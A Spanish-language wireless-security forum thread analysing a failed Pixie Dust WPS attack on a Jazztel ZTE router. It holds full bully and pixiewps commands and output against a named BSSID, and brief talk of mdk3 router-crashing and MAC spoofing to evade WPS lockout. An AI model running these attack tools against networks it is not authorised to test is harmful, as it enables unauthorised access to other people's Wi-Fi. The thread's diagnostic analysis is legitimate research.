El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
#1 17-01-2016 19:38:24
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
El ZTE H218N es un router empelado por jazztell desde unos cuantos años.
Al inicio tenía el WPS habilitado con PIN por defecto 12345670.
Era una masacre, se obtenían los pass WPA enseguida ya que reaver prueba por defecto 12345670 primero.
Jaztell se dí cuanta de este enorme brecha y deshabilitaron el WPS en mode PIN con una actualización de todos sus routers
Me parece que lo que hicieron es des-configurar el PIN.
El WPS esta habilitado (sale en wash) pero si PIN configurado
Normalmente si se ataca el PA no conseguís nada y mandáis el mismo >PIN en bucle durante horas...
algo así...
sudo bully wlan2mon -b 2C:95:7F:46:7B:C4 -v 4 -d -1 1
[!] Bully v1.0-25 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '681831424' reported by interface 'wlan2mon'
[!] Using '78:44:76:86:d9:e7' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '2c:95:7f:46:7b:c4' on channel 'unknown'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'JAZZTEL_XzSS' (2c:95:7f:46:7b:c4)
[+] Switching interface 'wlan2mon' to channel '1'
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/2c957f467bc4.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Rx( ID ) = 'Timeout' Next pin '08153876'
[+] Switching interface 'wlan2mon' to channel '5'
[+] Switching interface 'wlan2mon' to channel '9'
[+] Switching interface 'wlan2mon' to channel '13'
[+] Switching interface 'wlan2mon' to channel '2'
[+] Switching interface 'wlan2mon' to channel '6'
[+] Switching interface 'wlan2mon' to channel '10'
[+] Switching interface 'wlan2mon' to channel '3'
[+] Switching interface 'wlan2mon' to channel '7'
[+] Switching interface 'wlan2mon' to channel '11'
[+] Switching interface 'wlan2mon' to channel '4'
[+] Switching interface 'wlan2mon' to channel '8'
[+] Switching interface 'wlan2mon' to channel '12'
[+] Switching interface 'wlan2mon' to channel '1'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Rx( Assn ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '08153876'Y de repente...
[+] Rx( Auth ) = 'Timeout' Next pin '08153876'
[P] ENonce: 22:6f:99:96:5d:ae:5d:0e:06:46:ef:0d:20:cd:68:19
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: ZTE Corporation
[P] WPS Model Name: ZXHN H298N
[P] WPS Model Number: ZXHN H298N
[P] WPS Serial Number: 123456789012347
[P] RNonce: 55:9c:ff:e3:80:63:f2:5d:87:61:87:96:11:94:7e:e6
[P] PKR: 4a:7d:8a:9e:36:db:b1:69:45:7f:de:32:59:80:14:0e:07:3d:cd:3f:b5:3f:1c:69:a3:14:d1:ae:f0:fa:bf:1d:ed:7a:e3:07:8b:d1:cc:6e:d0:30:7a:80:cc:51:0e:b7:fa:a0:12:63:16:02:6d:7c:0d:91:29:25:fe:13:02:bf:a8:b4:4a:f3:e1:2e:25:a8:f4:1e:47:95:2e:bd:a2:ea:fe:06:5a:d6:27:99:8e:74:a2:cc:40:c5:4a:f5:97:e7:12:fc:7b:f1:ba:e4:a9:48:ed:6a:70:2a:c6:71:ca:00:61:a8:de:73:7f:f3:4b:f7:5b:84:90:b5:b8:f8:50:ab:55:23:90:44:ea:b5:56:b1:c1:41:2e:75:e3:c3:4d:90:d4:09:2d:0c:2d:c1:1a:53:7d:aa:99:8b:cb:33:64:75:19:dc:9b:4d:c1:e6:6a:ac:27:d9:3c:0d:b3:11:92:aa:5c:80:e4:9c:29:12:b6:a9:22:e4:e7:7c:d2:36:24:1e
[P] Authkey: 13:5f:c9:90:aa:11:4d:e8:d3:cf:33:aa:7e:da:3d:17:79:9a:28:9b:be:ba:ac:e6:be:37:c6:11:9b:d8:66:00
[P] E-Hash1: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[P] E-Hash2: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[+] Running pixiewps with the information, wait ...
Cmd : pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 4a:7d:8a:9e:36:db:b1:69:45:7f:de:32:59:80:14:0e:07:3d:cd:3f:b5:3f:1c:69:a3:14:d1:ae:f0:fa:bf:1d:ed:7a:e3:07:8b:d1:cc:6e:d0:30:7a:80:cc:51:0e:b7:fa:a0:12:63:16:02:6d:7c:0d:91:29:25:fe:13:02:bf:a8:b4:4a:f3:e1:2e:25:a8:f4:1e:47:95:2e:bd:a2:ea:fe:06:5a:d6:27:99:8e:74:a2:cc:40:c5:4a:f5:97:e7:12:fc:7b:f1:ba:e4:a9:48:ed:6a:70:2a:c6:71:ca:00:61:a8:de:73:7f:f3:4b:f7:5b:84:90:b5:b8:f8:50:ab:55:23:90:44:ea:b5:56:b1:c1:41:2e:75:e3:c3:4d:90:d4:09:2d:0c:2d:c1:1a:53:7d:aa:99:8b:cb:33:64:75:19:dc:9b:4d:c1:e6:6a:ac:27:d9:3c:0d:b3:11:92:aa:5c:80:e4:9c:29:12:b6:a9:22:e4:e7:7c:d2:36:24:1e -s 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f -z 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f -a 13:5f:c9:90:aa:11:4d:e8:d3:cf:33:aa:7e:da:3d:17:79:9a:28:9b:be:ba:ac:e6:be:37:c6:11:9b:d8:66:00 -n 22:6f:99:96:5d:ae:5d:0e:06:46:ef:0d:20:cd:68:19 -m 55:9c:ff:e3:80:63:f2:5d:87:61:87:96:11:94:7e:e6 -v 1
[Pixie-Dust] WPS pin not foundSin que sepa porquer consigo recibir un M1, mandar un M2 y recibir M3...
Pixiewps se ejecuta, sin exitó
Esto es raro...
Aún más raro, fijaros en el valor de e-hash 1 y e-hash 2 :
[P] E-Hash1: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
[P] E-Hash2: 61:f4:03:89:99:04:83:ed:c0:d4:c3:44:ca:95:29:b7:40:93:99:a1:87:9f:05:2f:9d:6a:b1:11:4b:3c:fb:9f
¡Son iguales! 
les recuerdo que no es possible...
...Al no ser que tengamos ES1 = ES2 y PSK1 = PSK2
para que psk1 sea igual a psk2 hay un solo PIN que cumple la regla del checksum : 00000000
por lo de ES1 = ES2 conocemos el caso ralink dónde los dos son iguales y son iguales a 0
Entonces si PSK1 = PSK2 = ES1 = ES2 = 0 deberíamos haber obtenido el PIN y no fue el caso.
Desde que lo he conseguido una primera vez parece que sale mas fácilmente con PIN 00000000.... siempre un fail pero otra vez tenemos este extraño resultado con eahsh-1 = eash-2
udo bully wlan2mon -b 2C:95:7F:46:7B:C4 -v 4 -d -1 1 -p 00000000 --force
[!] Bully v1.0-25 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '681831424' reported by interface 'wlan2mon'
[!] Starting pin specified, defaulting to sequential mode
[!] Using '78:44:76:86:d9:e7' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '2c:95:7f:46:7b:c4' on channel 'unknown'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'JAZZTEL_XzSS' (2c:95:7f:46:7b:c4)
[+] Switching interface 'wlan2mon' to channel '1'
[!] Restoring session from '/root/.bully/2c957f467bc4.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '00000000'
[P] ENonce: 1e:78:fe:d2:7d:5c:40:93:37:95:b3:07:7c:3a:9e:37
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: ZTE Corporation
[P] WPS Model Name: ZXHN H298N
[P] WPS Model Number: ZXHN H298N
[P] WPS Serial Number: 123456789012347
[P] RNonce: e4:ab:2f:2a:ec:52:fd:7d:e8:62:74:d2:fe:f5:35:61
[P] PKR: d3:39:d8:0b:15:5e:3e:8c:4c:97:60:f0:0e:3c:bc:dc:48:78:dd:7b:03:f7:85:59:80:21:b7:15:47:c8:2c:29:a8:02:66:c5:cd:87:97:c5:01:de:25:63:8c:f5:16:0d:7c:67:d4:b5:09:8d:ab:90:4c:de:e9:3a:30:70:fa:bc:4c:89:11:7e:38:05:1f:64:a5:d6:8d:af:fd:a7:d5:83:f4:c4:e6:d8:0c:2a:2e:82:3b:d0:43:2a:cc:6b:9c:20:b7:e1:71:3e:6e:e4:ca:09:c9:27:da:33:47:cf:6c:42:f5:46:ec:9b:1e:64:7c:05:84:87:89:2f:88:53:a5:8d:04:cb:c8:0e:dc:ea:1c:67:92:6c:4c:30:10:4e:b6:3b:e3:d7:89:40:c4:d9:47:d6:99:e6:98:54:cb:42:b9:7b:3a:d2:82:c9:da:6e:f6:cc:f1:f5:24:45:7c:e0:b7:ef:9c:e4:4a:93:bd:13:b5:76:cd:2d:9b:00:5b:08:07:32
[P] Authkey: 5e:03:6a:7c:4c:4e:fa:17:19:6a:e5:1a:d6:33:cf:76:e2:8c:b5:3b:df:5e:64:2c:a3:39:5e:3b:fc:ed:b2:73
[P] E-Hash1: 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10
[P] E-Hash2: 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10
[!] Received M2D or out of sequence WPS Message
[+] Running pixiewps with the information, wait ...
Cmd : pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d3:39:d8:0b:15:5e:3e:8c:4c:97:60:f0:0e:3c:bc:dc:48:78:dd:7b:03:f7:85:59:80:21:b7:15:47:c8:2c:29:a8:02:66:c5:cd:87:97:c5:01:de:25:63:8c:f5:16:0d:7c:67:d4:b5:09:8d:ab:90:4c:de:e9:3a:30:70:fa:bc:4c:89:11:7e:38:05:1f:64:a5:d6:8d:af:fd:a7:d5:83:f4:c4:e6:d8:0c:2a:2e:82:3b:d0:43:2a:cc:6b:9c:20:b7:e1:71:3e:6e:e4:ca:09:c9:27:da:33:47:cf:6c:42:f5:46:ec:9b:1e:64:7c:05:84:87:89:2f:88:53:a5:8d:04:cb:c8:0e:dc:ea:1c:67:92:6c:4c:30:10:4e:b6:3b:e3:d7:89:40:c4:d9:47:d6:99:e6:98:54:cb:42:b9:7b:3a:d2:82:c9:da:6e:f6:cc:f1:f5:24:45:7c:e0:b7:ef:9c:e4:4a:93:bd:13:b5:76:cd:2d:9b:00:5b:08:07:32 -s 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10 -z 2e:e1:6e:3f:6b:d4:b9:a3:36:ff:f0:42:48:9b:9f:bb:e6:2c:19:b2:ad:7b:c9:28:52:5f:a7:61:ce:11:43:10 -a 5e:03:6a:7c:4c:4e:fa:17:19:6a:e5:1a:d6:33:cf:76:e2:8c:b5:3b:df:5e:64:2c:a3:39:5e:3b:fc:ed:b2:73 -n 1e:78:fe:d2:7d:5c:40:93:37:95:b3:07:7c:3a:9e:37 -m e4:ab:2f:2a:ec:52:fd:7d:e8:62:74:d2:fe:f5:35:61 -v 1
[Pixie-Dust] WPS pin not found
[Pixie-Dust] PIN FOUND:
[+] Rx( M5 ) = 'WPSFail' Next pin '00000000'
[+] Rx( Auth ) = 'Timeout' Next pin '00000000'
[!] Received disassociation/deauthentication from the APEs dificil sacar conlcusiones en estas condicones con un router pacheado y sin posibildad de configurar el WPS.
El routeur esta en un estado extraño pero el hecho de que sus "nounces" que deberían ser unicas son iguales podría indicar una falta de entropia y simplificar drasticamente - si es el caso - un eventual brute force ya que se haría con pares de es-1 y es-2 similares sobre las 11000 possibilidades que representan los PSK1 (primera mitad) y PSK2 (segunda mitad)
Además ha genrado la misma PKE... la e-nouce es diferente pero la PKE es la misma.
¡Recuerdo que es por PKE repetidas que hemos puesto el dedo en la brecha realtek!
¡Y es exactamente la misma PKE para este router con chipset broadcom!
El soporte broadcom en pixiewps esta muy limitado.... no he conseguido nada sobre ninguno dispositivo comtrend (suelen levar broadcom) o lo que sea que abundan aquí en España.
¿Tenemos aqui algo de materia para lograr algo contra otros chipsets boradcom que los soportafos?
¿O es simplemente un comportamiento errático y anormal del WPS con el PIN des-configurado y no nos sirve?
Es también de interés esta extraña capacidad a inyectar paquetes M de repente...
¿Se podría llegar a algun tipo de estado extraño vulnerable con una inyección masiva de m2?... Además sobre un dispositivo que no debería mandar unos M1 (menos aún M3)
Es algo que había probado el compañero soxrok2212 y había obtenido algo de resultados... ( ver Force an AP to reboot @ kali forum)
A ver....
Desconectado
#2 17-01-2016 22:04:10
- d1k0w0ns
- Expulsado
- Registrado: 12-06-2015
- Mensajes: 374
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
el nuevo codigo de murderdeadkill3 que anuncian en el post de kali no existe esta desaparecido del git, tu lo tienes?
lo han quitado por algo que no lei??
no iria muy bien supongo no lei todo el post voy con las prisas xD
me baje otro del mismo hilo que se llama VMR-MDK a ver si lo pruebo.
Desconectado
#3 18-01-2016 01:52:56
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
no iria muy bien supongo no lei todo el post voy con las prisas xD
supones bien 
el nuevo codigo de murderdeadkill3
No se a que código te refieres / no lo tengo
me baje otro del mismo hilo que se llama VMR-MDK a ver si lo pruebo.
El script favorito de Saturno ...
...Esto no lleva nada nuevo.
Es un script que usa mdk3 y el cambio de mac para intentar burlar el bloqueo del WPS... digo bien "intentar" porque los resultados se hacen aún esperar
Ya sabes lo que hay con el cambio de mac (no sirve) y ya sabes lo que hay con lo de hacer crashear un router con inyección de paquetes con mdk3 (funcionara con routers de 2002 con 4MB de RAM)
Desconectado
#4 18-01-2016 13:55:59
- d1k0w0ns
- Expulsado
- Registrado: 12-06-2015
- Mensajes: 374
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
me referia a este codigo que sale en el primer mensaje que ahora me fije en todo y es del 2013
-Thanks to a Musket Developer, the community now has a modified version of MDK3! This version features a new test mode "t" where it sends a user specified amount of invalid probe requests to an AP.
-You can download mdk3-master here https://github.com/soxrok2212/mdk3-master
si fuera bien supongo que seguiria estando y no lo hubieran borrado porque el resto del git funciona.
si el forked VMR-MDK se basa en el cambio de mac tema cerrado sobre ese codigo, no sirve para nada
para que pones posts del 2013 sin avisar no ves que confundes 
Desconectado
#5 18-01-2016 22:43:03
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
2013 es la fecha de inscripción de soxrok2212
El tema fue abierto el 2015-05-11, 11:10 PM
No se porque soxrok2212 lo ha retirado, muy probablemente porque no cumplía o no servía.
Si te interesa le puedo preguntar porque y obtener el código si es posible
Lo que hacía esta nueva opcion "-t" es lo mismo que un "SSID brute force" pero mandando solo SSID con caracteres "inválidos".
Cosa que al final se puede hacer de todo modo directamente con mdk3v6 y sus opciones "nativas" si especificas un diccionario o un charset con símbolos "inválidos" para hacer una inyección de eSSID.
Desconectado
#6 19-01-2016 17:47:54
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Conclusión sobre este caso extraño de ataque pixiedust "falso"
Después haber expuesto el caso en el foro Kali y de haber hablado del caso con wiire (pixiewps) y soxrok2212 (reaver 1.5.2 ) hemos podido entender lo que pasaba
Teníamos dos cosas alucinantes :
PKE repetida que es igual a la PKE utilizada por los routers con chipset Realteck
Ehash-1 es igual a Ehash-2
Primer punto :
Hay un error en la wikidevi o existen varias versiones de este modelo, el caso es que el router lleva un chipset realtek.
Se puede ver en uno de los tag "Vendor specific"
Normal entonces encontrar la PKE especifica a los chipset realtek
Segundo punto :
wiire comentó que ha obtenido las mismas cadenas para ehash1 y ehash2 contra chipset ralink cuando el router esta solo en modo PBC.(No wps pìn)
Como nuestro ZTE no tiene el WPS habilitado es "normal" que recibamos estos ehash repetidos.
No nos sirven para nada...
...Excepto enterarnos de que un router tiene o no el WPS en mode PIN habilitado y funcionando.
Al final no es poca cosa. :
Si atacamos un PA y que obtenemos Ehash1 = Ehash2 sabemos que el router no tiene el WPS en mode PIN habilitado del todo y que no podremos obtener la llave WPA aunque tenemos el PIN valido.
Desconectado
#7 19-01-2016 21:44:21
- Patcher
- waircut
- Registrado: 14-01-2016
- Mensajes: 656
Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado
Una explicación genial, como siempre.
Me estaba preguntando, que si en Prácticamente todos los mensajes WPS figura el campo Config Method, en el cual el AP indica los modos de configuración WPS que tiene habilitados.
